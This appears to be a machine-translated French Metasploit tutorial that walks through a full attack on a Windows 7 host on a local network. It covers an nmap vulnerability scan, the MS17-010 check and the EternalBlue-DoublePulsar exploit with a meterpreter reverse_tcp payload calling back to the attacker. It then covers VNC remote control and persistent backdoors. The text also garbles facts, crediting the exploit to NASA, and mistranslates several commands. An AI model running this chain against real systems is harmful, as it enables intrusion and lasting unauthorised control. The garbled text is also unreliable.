métasploit

Tutoriel Metasploit

Tutoriel Metasploit

Comme nous avons discuté du TOP 25 des MEILLEURS OUTILS KALI LINUX et que nous avons mis METASPLOIT en premier dans la liste, discutons maintenant et découvrons METASPLOIT. Nous vous recommandons de vous familiariser avec Metasploit.

Metasploit initialement créé par H. D Moore en 2003, jusqu'à son acquisition et son développement par Rapid7 le 21 octobre 2009. Metasploit-framework est entièrement écrit à l'aide de Ruby et est un package standard installé dans le système Kali Linux (et aussi presque tous les systèmes d'exploitation de test de pénétration, je suppose). C'est un kit préféré des pirates ou des testeurs d'intrusion pour rechercher les vulnérabilités de sécurité, développer et exécuter des exploits sur des cibles et d'autres développements de sécurité.

Metasploit est livré avec plusieurs éditions, généralement divisées en deux catégories, version gratuite et version payante. Les versions gratuites : Metasploit Framework Community Edition (interface basée sur CLI) et Armitage (interface basée sur GUI). Les versions payantes : Metasploit Express, Metasploit Pro et Cobalt Strike (c'est similaire à Armitage, qui est fourni par Strategic Cyber ​​LLC).

Metasploit permet aux utilisateurs de créer (ou développer) leur propre code d'exploit, mais ne vous inquiétez pas si vous ne savez pas coder, Metasploit a tellement de modules et ils sont continuellement mis à jour. Actuellement, Metasploit a plus de 1600 exploits et 500 payloads. Le moyen simple de comprendre ce que sont les exploits et les charges utiles, un exploit est essentiellement la façon dont l'attaquant livre la charge utile, à travers le trou de vulnérabilité du système cible.  Une fois que l'attaquant lance l'exploit qui contient une charge utile contre la cible vulnérable, puis la charge utile déployée (charge utile utilisée pour se reconnecter à l'attaquant pour obtenir un accès à distance contre le système cible), à ​​ce stade, l'exploit est terminé et devient non pertinent.

"Metasploit n'est pas un outil instantané de piratage, c'est un framework insensé"

Cet article Metasploit concerne la réalisation de tests d'intrusion sur un système cible en utilisant le flux suivant :


PRÉPARATION

Assurez-vous que notre Kali Linux dispose de la dernière version mise à jour. Il y aura des améliorations dans chaque mise à jour. Exécutez les commandes suivantes :

~# apt mise à jour
~# apt upgrade -y
~# apt dist-upgrade -y

Une fois notre machine à jour, commençons maintenant par lancer la console metasploit. Dans le terminal, tapez :

~# msfconsole

Et vous avez également besoin d'un éditeur de texte, Gedit ou Leafpad, pour collecter des informations en cours de route avant de compiler l'attaque. Tout d'abord, identifiez votre adresse IP de l'interface sans fil, l'adresse IP du routeur et le masque de réseau.

Sur la base des informations ci-dessus, nous notons l'adresse IP du WLAN1 et du routeur, ainsi que le masque de réseau. Ainsi, la note devrait ressembler à ceci :

IP de l'attaquant (LHOST) : 192.168.1.56
IP passerelle/routeur : 192.168.1.1
Masque de réseau : 255.255.255.0(/24)


ÉTAPE 1 : ANALYSE DE VULNÉRABILITÉ

Dans la console metasploit, nous recueillons ensuite d'abord des informations, telles que l'adresse IP cible, le système d'exploitation, les ports ouverts et la vulnérabilité. Metasploit nous permet d'exécuter NMap directement depuis la console. Sur la base des informations ci-dessus, exécutez cette commande pour accomplir notre tâche de collecte d'informations.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

De la commande ci-dessus, nous avons obtenu le résultat ci-dessous.

Nous avons une cible vulnérable exécutant le système d'exploitation Windows, et la vulnérabilité est sur le service SMBv1. Alors, ajoutez à la note.

Adresse IP cible (RHOST) :  192.168.1.57
Vulnérabilité : vulnérabilité d'exécution de code à distance dans les serveurs Microsoft SMBv1 (ms17-010)


ÉTAPE 2 : ÉVALUATION DE LA VULNÉRABILITÉ

Maintenant, nous connaissons la cible et sa vulnérabilité. Vérifions la vulnérabilité dans la console metasploit

On connaît maintenant la cible et sa vulnérabilité. Vérifions la vulnérabilité dans la console metasploit à l'aide du module auxiliaire smb_scanner. Exécutez la commande suivante :

msf > utiliser auxiliaire/scanner/smb/smb_ms17_010
auxiliaire msf (smb_ms17_010) > définir RHOSTS [adresse IP cible]
auxiliaire msf (smb_ms17_010) > exécuter

Metasploit est confiant quant à la vulnérabilité, et il montre l'édition exacte du système d'exploitation Windows. Ajouter à la note :

OS cible : Windows 7 Ultimate 7600


ÉTAPE 3 : EXPLOITER

Malheureusement, metasploit n'a pas de module d'exploitation lié à cette vulnérabilité. Mais, ne vous inquiétez pas, il y a un gars à l'extérieur exposé et a écrit le code d'exploit. L'exploit est familier, puisqu'il est initié par la NASA, il s'appelle EternalBlue-DoublePulsar. Vous pouvez le récupérer à partir d'ici, ou vous pouvez suivre le guide du didacticiel vidéo ci-dessous pour installer le code d'exploit sur votre framework metasploit.

Une fois que vous avez suivi le guide ci-dessus, (assurez-vous que le chemin est le même que le tutoriel). Maintenant, vous êtes prêt à exploiter la cible. Exécutez les commandes suivantes :

utiliser exploit/windows/smb/eternalblue_doublepulsar
définir la charge utile windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.EXE
régler RHOST 192.168.1.57
définir LHOST 192.168.1.56

Exploit

Boum… L'exploit réussi, on a une session meterpreter. Comme je l'ai mentionné plus tôt, une fois l'exploit lancé, il déploiera la charge utile, qui est, ici, nous avons utilisé, windows/compteur/reverse_tcp.


ÉTAPE 4 : OBTENIR UN ACCÈS À DISTANCE

Explorons les commandes les plus disponibles, entrez '?' (sans point d'interrogation) et voir les commandes disponibles répertoriées. le Stdapi, les commandes système sont :

Pour afficher plus d'informations sur le système cible, utilisez 'infosys' commande. La sortie devrait ressembler à ceci.

Puisque nous injectons plus tôt dans le processus système (spoolsv.exe), nous avons le privilège système. Nous possédons la cible. Nous pouvons faire beaucoup avec la commande à la cible. Par exemple, nous pourrions exécuter RDP ou simplement définir une télécommande VNC. Pour exécuter le service VNC, entrez la commande :

~# exécuter vnc

Le résultat devrait être le bureau de la machine cible, il ressemble à ceci.

La partie la plus importante est de créer une porte dérobée, donc chaque fois que la cible se déconnecte de notre machine, la machine cible essaiera de se reconnecter, à nouveau avec nous. La porte dérobée est utilisée pour maintenir l'accès, c'est comme la pêche, vous ne rejetterez pas votre poisson à l'eau une fois que vous aurez le poisson, n'est-ce pas? Vous voulez faire quelque chose avec le poisson, que ce soit pour le conserver au réfrigérateur pour d'autres actions, comme cuisiner ou le vendre pour de l'argent.

Meterpreter a cette fonction de backdoor en permanence. Exécutez la commande suivante et examinez les paramètres et arguments disponibles.

compteurpretre > exécuter persistance -h

Si vous n'êtes pas à l'aise avec ce script obsolète, le module de persistance le plus récent est sous post/windows/gérer/persistence_exe. Vous pouvez l'explorer plus loin par vous-même.

Metasploit est énorme, ce n'est pas seulement un outil, c'est un framework, considérez qu'il a plus de 1600 exploits et environ 500 payloads. Un article est juste adapté pour la grande image de l'utilisation générale ou de l'idée. Mais, vous avez tellement appris de cet article.

"Plus vous suivez le flux d'attaque, plus vous avez de défis sans effort."

Comment installer League Of Legends sur Ubuntu 14.04
Si vous êtes fan de League of Legends, alors c'est l'occasion pour vous de tester League of Legends. Notez que LOL est pris en charge sur PlayOnLinux ...
Installez le dernier jeu de stratégie OpenRA sur Ubuntu Linux
OpenRA est un moteur de jeu de stratégie en temps réel libre/gratuit qui recrée les premiers jeux Westwood comme le classique Command & Conquer: Red A...
Installez le dernier émulateur Dolphin pour Gamecube et Wii sur Linux
L'émulateur Dolphin vous permet de jouer aux jeux Gamecube et Wii de votre choix sur des ordinateurs personnels Linux (PC). Étant un émulateur de jeu...